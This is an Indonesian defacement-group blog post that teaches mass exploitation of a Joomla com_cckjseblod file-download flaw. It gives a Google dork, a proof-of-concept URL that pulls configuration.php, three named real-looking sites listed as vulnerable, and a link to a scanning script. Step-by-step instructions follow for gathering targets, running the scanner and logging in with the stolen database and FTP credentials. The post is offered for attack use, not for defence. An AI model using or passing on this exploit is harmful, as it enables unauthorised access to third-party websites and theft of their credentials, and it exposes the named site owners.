Jomlaa get database dan ftp beserta user&pass admin login web

A3 Team    Deface   

Oke Kali Ini Gua Mau share tutorial lawas Joomla Get Database dan Ftp beserta username login dan password .

> Exploit Title: Joomla Config File Download Vulnerability

>Google Dork : inurl:option=com_cckjseblod

> POC : http://site.com//index.php?option=com_cckjseblod&task=download&file=configuration.php

> Vulnerabillity Site : http://www.siancoeg.com/index.php?option=com_cckjseblod&task=download&file=configuration.php
http://www.rockmyrun.com/index.php?option=com_cckjseblod&task=download&file=configuration.php
http://www.waterco.com.au/index.php?option=com_cckjseblod&task=download&file=configuration.php

> Script Exploit : https://pastebin.com/raw/Wh9MtwG1

-----------------------------

1.Ini Khusus PC/Laptop for windows kalo linux/ Lewat Hp Via termux belum nemu scriptnya.

2.Download Xampp,Kalo udah ada skip aja.

3.Download script exploit, dan simpan script tersebut difolder Xampp-Php- dan buat file Result.html,kadang otomatis ada pas lu dah pindahin file php tadi .

4.Lu cari list di google dengan dork " inurl:option=com_cckjseblod" Salin Domain linknya aja Kalo kumpulin sebanyak mungkin biar bisa nemuin hasil banyak.

5.site yang udah terkumpul lu simpan di Xampp-Php-namafile.txt

6.Nah sekarang tinggal Eksekusi aja.

7.Buka CMD Panggil perintah Cd c:/Xampp/php, Lanjut lagi .

8.nah bagian ini lo panggil perintah lagi php namafile.php namafile.txt nanti dia otomatis scan web yang Vuln,Nanti gua kasih gambar web vuln.

9.Kalo dah dapat database sama ftp tinggal login deh udah tau kan loginnya dimana gua capek cuy ngetiknya wkwkwk,Tapi kalo localhost/ ip 127.0.0.1 mah diskip aja.

10.Dah sampe sini tutorial dari gua.

Note : Kalo upload shell gua belum tau karena gua biasanya make ini exploit untuk dapatin DB sama Ftp aja hehe😊

Note : Dork bisa kalian kembangin dengan menambahkan domain berbagai negara contoh : .id .in .uk .ca dll masih banyaklah.

-azay